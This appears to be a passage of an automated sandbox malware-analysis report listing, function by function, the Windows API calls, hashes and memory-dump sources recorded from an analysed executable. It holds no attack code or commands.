QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631B9
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631C3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631CB
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,008D8178), ref: 008631D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 5a72df828cd1c6be47380d71544e3248704caa4e9626a3fcab62601c62df83ae
Instruction ID: 4776f297e436989f8f81ea0e4ee5f1c4897dc79c45b58a8fd39cd6c30bdc613b
Opcode Fuzzy Hash: 5a72df828cd1c6be47380d71544e3248704caa4e9626a3fcab62601c62df83ae
Instruction Fuzzy Hash: 7F119336D0411DABCF009F99E9049EDB778FF49722F024655EA05B7204DB35AA018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0088551D, Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 0088553C
SendMessageW.USER32(?,00001008,00000000,00000000), ref: 00885557
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteDestroyMessageObjectSend$IconWindow
String ID:
API String ID: 3691411573-0
Opcode ID: 903dbdb5973c96bb732c73788dc2d4ee0d4f38ac7356250f20a8b9754fffbe99
Instruction ID: 3a51189a5561836631b5a47c312860cf0235e4daae1707ea9595ee445ca80b3e
Opcode Fuzzy Hash: 903dbdb5973c96bb732c73788dc2d4ee0d4f38ac7356250f20a8b9754fffbe99
Instruction Fuzzy Hash: 34118C71304701ABCB10EF68ECC8A2A77A8FB64321F504B59FD04CB2E5D731E84A8B65

Uniqueness

Uniqueness Score: -1.00%

Function 00877199, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 008770BF: DeleteObject.GDI32(00000000), ref: 008770FC
Part of subcall function 008770BF: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 0087713C
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087714C
Part of subcall function 008770BF: BeginPath.GDI32(?), ref: 00877161
Part of subcall function 008770BF: SelectObject.GDI32(?,00000000), ref: 0087718A

MoveToEx.GDI32(?,?,?,00000000), ref: 008771C4
LineTo.GDI32(?,?,?), ref: 008771D0
MoveToEx.GDI32(?,?,?,00000000), ref: 008771DE
LineTo.GDI32(?,?,?), ref: 008771EA
EndPath.GDI32(?), ref: 008771FA
StrokePath.GDI32(?), ref: 00877208

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
String ID:
API String ID: 372113273-0
Opcode ID: 27e10ff62af5e206eabc3fc348536bc9f2737494a3d26bda8002ac34d15cbcb9
Instruction ID: a63ee21772a391165d19978d7ba5f1515164bd0e88521e7deaa6157e55dad979
Opcode Fuzzy Hash: 27e10ff62af5e206eabc3fc348536bc9f2737494a3d26bda8002ac34d15cbcb9
Instruction Fuzzy Hash: C001BC72102214BBE712AB48EC8DFDB7B6CFF4A720F048305FA11A619187B06A01CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0083F010, Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0083F048
MapVirtualKeyW.USER32(00000010,00000000), ref: 0083F050
MapVirtualKeyW.USER32(000000A0,00000000), ref: 0083F05B
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0083F066
MapVirtualKeyW.USER32(00000011,00000000), ref: 0083F06E
MapVirtualKeyW.USER32(00000012,00000000), ref: 0083F076

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: c92cefb2a081de827aae43f3b5518169307009f94ba30a0916a0dad4a3fc7499
Instruction ID: 4cafa4b8b66c3bb1ffe320bf0f1aa541f4af937ffffee66dfbfccbbfeadf3a41
Opcode Fuzzy Hash: c92cefb2a081de827aae43f3b5518169307009f94ba30a0916a0dad4a3fc7499
Instruction Fuzzy Hash: A3016770106B88ADD3309F668C84B43FFF8EF95704F01490DD1D507A52C6B5A84CCB69

Uniqueness

Uniqueness Score: -1.00%

Function 0087B5C7, Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 0087B5E1
EnterCriticalSection.KERNEL32(?), ref: 0087B5F2
TerminateThread.KERNEL32(?,000001F6), ref: 0087B600
WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0087B60E

Part of subcall function 008625E5: CloseHandle.KERNEL32(00000000,00000000,?,0087B61A,00000000,?,000003E8,?,000001F6), ref: 008625F3

InterlockedExchange.KERNEL32(?,000001F6), ref: 0087B623
LeaveCriticalSection.KERNEL32(?), ref: 0087B62A

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ac7193989c8244d9014246625129103ede1a057404d664267d07d7d563a7ba59
Instruction ID: 0f3b01723a915d206ca907725fb974c2e0395ecd3cea91c995454902051aab74
Opcode Fuzzy Hash: ac7193989c8244d9014246625129103ede1a057404d664267d07d7d563a7ba59
Instruction Fuzzy Hash: 1AF0AF72141201BBC210AB64EC88DABB77DFF44311B400626F606C2550CB34E421CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008450DB, Relevance: 9.0, APIs: 6, Instructions: 29threadCOMMON

Download Yara Rule

APIs

___set_flsgetvalue.LIBCMT ref: 008450E0

Part of subcall function 008477D1: TlsGetValue.KERNEL32(?,0084792A,?,008412DC,?,00000001), ref: 008477DA
Part of subcall function 008477D1: TlsSetValue.KERNEL32(00000000,?,008412DC,?,00000001), ref: 008477FB

___fls_getvalue@4.LIBCMT ref: 008450EB

Part of subcall function 008477B1: TlsGetValue.KERNEL32(?,?,00843C50,00000000), ref: 008477BF

___fls_setvalue@8.LIBCMT ref: 008450FD
GetLastError.KERNEL32(00000000,?,00000000), ref: 00845106
ExitThread.KERNEL32 ref: 0084510D
__freefls@4.LIBCMT ref: 00845129

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
String ID:
API String ID: 442100245-0
Opcode ID: 8dbcb2af899a6edce51d0a8780c066068f5a184bcad8b22c5fdf2082096bdeb2
Instruction ID: 0a87261d43b8d480cfc128a41ee212b2302e3ac40eec0f5014830dd453058b12
Opcode Fuzzy Hash: 8dbcb2af899a6edce51d0a8780c066068f5a184bcad8b22c5fdf2082096bdeb2
Instruction Fuzzy Hash: 46F08C78404748AFD708BFB8C949D0E3BA9FF883143618554B808C7227DB38C842CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 008783D9, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00878492
IsMenu.USER32(?), ref: 008784A6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008784F4
DrawMenuBar.USER32 ref: 00878508

Strings

0, xrefs: 008783F3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 715573736359dbd40793bd326a38c85d2966521ff7197e47623e777e76aff6a2
Instruction ID: aa6b7e9647c867e3701238e09adbfe22ddf60cc2b100f98906320eb01dd56d22
Opcode Fuzzy Hash: 715573736359dbd40793bd326a38c85d2966521ff7197e47623e777e76aff6a2
Instruction Fuzzy Hash: 3B419C75A00209DFDB20CF95E888FDAB7B5FF88314F14825AE9199B394CB70E845CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00873346, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?), ref: 00873376

Strings

nul, xrefs: 008733EC

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: 677a0af867f9dfcc376d2b7c60587b18e25099bea5d58c4c4e46844ce346918a
Instruction ID: cdec003ec8e2b3519d275f41dc16fa27d15a909eec61850c80323c9be0acc051
Opcode Fuzzy Hash: 677a0af867f9dfcc376d2b7c60587b18e25099bea5d58c4c4e46844ce346918a
Instruction Fuzzy Hash: 42317171500209ABD730DF68EC49BAA77A8FF54320F108649FD55D72D0EB71D960DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00873253, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00873281

Strings

nul, xrefs: 008732F8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Handle
String ID: nul
API String ID: 2519475695-2873401336
Opcode ID: aa3f5187236e726b5249e61fec0040941f00f585ee8b7d829aec0eff7def5b09
Instruction ID: cb1a5179dd2e1c14620433ece096561f60c09d0d03afc3424b8d66f7dec6edbc
Opcode Fuzzy Hash: aa3f5187236e726b5249e61fec0040941f00f585ee8b7d829aec0eff7def5b09
Instruction Fuzzy Hash: 5B217E31650208ABE7209F68DC45FAAB7A8FF15321F10874AFDA4D72D0EB71DA50D792

Uniqueness

Uniqueness Score: -1.00%

Function 0088D435, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0088D446
GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0088D4BC
__swprintf.LIBCMT ref: 0088D4D6
SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0088D51A

Strings

%lu, xrefs: 0088D4D0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: a5312c5507b3d62fcc9f1aa1ea4eee29d3c41281efe83eda231acd72215f02c3
Instruction ID: 8074cd3d5efe63de2f3a2dadd8261fc6f4d4efa7ccb5e34441b3fcccfae12948
Opcode Fuzzy Hash: a5312c5507b3d62fcc9f1aa1ea4eee29d3c41281efe83eda231acd72215f02c3
Instruction Fuzzy Hash: 30311C71A00209AFCB14EF98D885EAEB7B8FF88700F108555E505EB391D634EE45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 008912A0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

Part of subcall function 00866406: SendMessageTimeoutW.USER32 ref: 00866425
Part of subcall function 00866406: GetWindowThreadProcessId.USER32(?,00000000), ref: 00866438
Part of subcall function 00866406: GetCurrentThreadId.KERNEL32 ref: 0086643F
Part of subcall function 00866406: AttachThreadInput.USER32(00000000), ref: 00866446

GetFocus.USER32 ref: 008912C7

Part of subcall function 00866451: GetParent.USER32(?), ref: 0086645F
Part of subcall function 00866451: GetParent.USER32(?), ref: 0086646B

GetClassNameW.USER32 ref: 00891310
EnumChildWindows.USER32 ref: 0089133B
__swprintf.LIBCMT ref: 00891354

Strings

%s%d, xrefs: 0089134E

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
String ID: %s%d
API String ID: 2645982514-1110647743
Opcode ID: 12d927172adb5e6c67ba90ddaa199f1acd0641550dcc1927521772478c04baae
Instruction ID: 1ae30652993fa786de10e8a811d95aa57ad87acdc3109f586997699f10baf93e
Opcode Fuzzy Hash: 12d927172adb5e6c67ba90ddaa199f1acd0641550dcc1927521772478c04baae
Instruction Fuzzy Hash: 36219F715003196BCB20AF699C85FEBB7ACFF85710F00801AF919D3341DA74A8558BB1

Uniqueness

Uniqueness Score: -1.00%

Function 0087C2F0, Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 0087C348
SetKeyboardState.USER32(00000080), ref: 0087C36C
PostMessageW.USER32 ref: 0087C3B0
PostMessageW.USER32 ref: 0087C3E8
SendInput.USER32(00000001,?,0000001C), ref: 0087C475

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: KeyboardMessagePostState$InputSend
String ID:
API String ID: 3031425849-0
Opcode ID: bf07f5b3fa41b7759dc1827cb51b4895c9825e62978137f3269c8e63835ad082
Instruction ID: 5f0620f36e9ae0ed57e8c08fe05b2d9df264460a959b0f05715c7c575b3e5abc
Opcode Fuzzy Hash: bf07f5b3fa41b7759dc1827cb51b4895c9825e62978137f3269c8e63835ad082
Instruction Fuzzy Hash: D141267250024C6ADB20DF699885BFE7B68FF56310F40C15AFD88DB286C335D9568BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0089444F, Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0089449A
GetProcAddress.KERNEL32(?,?), ref: 00894534
GetProcAddress.KERNEL32(?,00000000), ref: 00894553
GetProcAddress.KERNEL32(?,?), ref: 00894597
FreeLibrary.KERNEL32(?,?,?,?), ref: 008945B9

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID:
API String ID: 2449869053-0
Opcode ID: 74600caa49d766fb2ae99fed1182a3dbdf75a4a8701cf1235651af2c1c9b9bd2
Instruction ID: af1acc5636f1ac803a17a4f300e1400dcf6576aea36ea88e93224f696c01467b
Opcode Fuzzy Hash: 74600caa49d766fb2ae99fed1182a3dbdf75a4a8701cf1235651af2c1c9b9bd2
Instruction Fuzzy Hash: 36513C756002049FCB14EF68C885EAEB7B9FF89310F148559E909EB351DB34EE42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00886308, Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0088631D
ScreenToClient.USER32 ref: 0088633A
GetAsyncKeyState.USER32(?), ref: 00886377
GetAsyncKeyState.USER32(?), ref: 00886387
GetWindowLongW.USER32 ref: 008863DD

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorLongScreenWindow
String ID:
API String ID: 3539004672-0
Opcode ID: 31c11e5aa72567cee1c482040e8bf39e0d6c4ad1fcfec48cc42d97193e996ee0
Instruction ID: 4f7cd32fabd52412a70b0cddcbfb75447efa1c49f0fb00c94dbfe04525353dbf
Opcode Fuzzy Hash: 31c11e5aa72567cee1c482040e8bf39e0d6c4ad1fcfec48cc42d97193e996ee0
Instruction Fuzzy Hash: C4412A75504214BBDB24EF68C888EEFBBB8FF45320F204659F865D7290DA30AA50DB61

Uniqueness

Uniqueness Score: -1.00%

Function 008AD3C9, Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(008D7F04), ref: 008AD3F2
InterlockedDecrement.KERNEL32(008D7F04), ref: 008AD407
Sleep.KERNEL32(0000000A), ref: 008AD40F
InterlockedIncrement.KERNEL32(008D7F04), ref: 008AD41A
InterlockedDecrement.KERNEL32(008D7F04), ref: 008AD524

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked$DecrementIncrement$Sleep
String ID:
API String ID: 327565842-0
Opcode ID: a6b7401db73efe3f87fff5f6685e2289ca1191a713fe97fcf3ca458cb27a4c8d
Instruction ID: f10c73c6e6a4b697a2e9f7b1feff6880a97f9b73663f210c6644aff2bf62a1ca
Opcode Fuzzy Hash: a6b7401db73efe3f87fff5f6685e2289ca1191a713fe97fcf3ca458cb27a4c8d
Instruction Fuzzy Hash: 4D41D1B2A012199BDB11EF68CCC5EAE7774FB89300F04461AE616E7751EB34F905CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0088C3AE, Relevance: 7.6, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 0088C43C
GetPrivateProfileSectionW.KERNEL32 ref: 0088C464
WritePrivateProfileSectionW.KERNEL32 ref: 0088C4B0
WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0088C4D4
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0088C4E3

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 22edeb2ba0f86468a4546bfcf1c41d1ebd06ca9349491a0041654dad51273e87
Instruction ID: d1eb952d155ecf38ee3cc831418df12127da0950963ed9c289899c7d73e9d5a2
Opcode Fuzzy Hash: 22edeb2ba0f86468a4546bfcf1c41d1ebd06ca9349491a0041654dad51273e87
Instruction Fuzzy Hash: FA4142B5A00209BBDB10EBA4DC89F6EB3A8FF44704F148558F504DB251DB75EE44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008794AE, Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 008794F1

Part of subcall function 00860593: _wcspbrk.LIBCMT ref: 008605A3

SendMessageW.USER32(?,00001074,?,?), ref: 00879551
_wcslen.LIBCMT ref: 00879566
_wcslen.LIBCMT ref: 00879573
SendMessageW.USER32(?,00001074,?,?), ref: 008795A7

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$_wcslen$_wcspbrk
String ID:
API String ID: 1856069659-0
Opcode ID: 6d7be263176cf817af3e4401dba2673fc79a46e8372efdd9af5d1d58e4d3bc93
Instruction ID: 9dd0f7462c92bced1e73672d31506da2e7f4eac6bb9937f29a64c43ca840c06e
Opcode Fuzzy Hash: 6d7be263176cf817af3e4401dba2673fc79a46e8372efdd9af5d1d58e4d3bc93
Instruction Fuzzy Hash: C63184719002189BDB24DF59EC81EDEB378FF94720F10825AF918D7284E7B1DA95CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00885071, Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

